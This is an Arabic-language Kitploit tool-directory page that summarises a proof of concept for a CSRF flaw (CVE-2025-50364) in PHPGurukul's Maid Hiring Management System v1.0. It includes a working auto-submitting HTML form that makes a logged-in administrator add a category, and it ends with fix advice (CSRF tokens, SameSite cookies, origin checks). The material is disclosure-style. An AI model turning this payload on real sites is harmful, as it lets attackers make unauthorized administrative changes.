Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-50364_CSRF_ADD_CATEGORY-phpgurukul-CVE — إثبات المفهوم لثغرة CSRF في PHPGurukul Maid Hiring Management System v1.0، يوضح إنشاء فئة غير مصرح بها عبر طلبات ضارة مصممة. | Kitploit
أدوات/GitHubGitHub/1h3ll/cve-2025-50364_csrf_add_category-phpgurukul-cve
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHub1h3ll/cve-2025-50364_csrf_add_category-phpgurukul-cve

CVE-2025-50364_CSRF_ADD_CATEGORY-phpgurukul-CVE

إثبات المفهوم لثغرة CSRF في PHPGurukul Maid Hiring Management System v1.0، يوضح إنشاء فئة غير مصرح بها عبر طلبات ضارة مصممة.

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
منذ سنة واحدةلم تتم المراجعة بعد

اسم المشروع ورابط المستودع: نظام إدارة توظيف الخادمات باستخدام PHP وMySQL

نوع الثغرة: تزوير الطلب من جانب العميل

الإصدار (الإصدارات) المتأثرة: v1.0

💣وصف الثغرة: توجد ثغرة تزوير الطلب عبر المواقع (CSRF) في لوحة الإدارة لنظام PHPGurukul لإدارة التوظيف، مما يسمح للمهاجم بإضافة فئات توظيف عشوائية عن طريق خداع مسؤول موثوق لزيارة موقع ضار. قد يؤدي ذلك إلى تلوث البيانات وتغييرات غير مصرح بها على مستوى الإدارة.

👩‍💻التأثير: إنشاء فئات غير مصرح بها

🛜إثبات المفهوم (PoC)

  1. كانت هناك وظيفة إضافة فئة حيث يمكن للمسؤول الموثوق فقط إضافة فئة. 1
  2. كود HTML لإرسال طلب POST إلى نقطة النهاية /admin/add-category.php CSRF-POC 2
root@kitploit:~
<html>
  <body>
    <form action="http://127.0.0.1/mhms/admin/add-category.php" method="POST">
      <input type="hidden" name="catname" value="CSRF&#45;POC" />
      <input type="hidden" name="submit" value="" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
  1. استخدم كود HTML وقم بصياغة رابط خبيث. 3
  2. بعد أن ينقر المسؤول على الرابط، سيتم إضافة فئة جديدة. 4 5

التوصية: تنفيذ رموز CSRF في نماذج الإدارة، وفرض ملفات تعريف الارتباط SameSite، والتحقق من مصدر الطلب لمنع الإجراءات غير المصرح بها.

تنزيل الأداة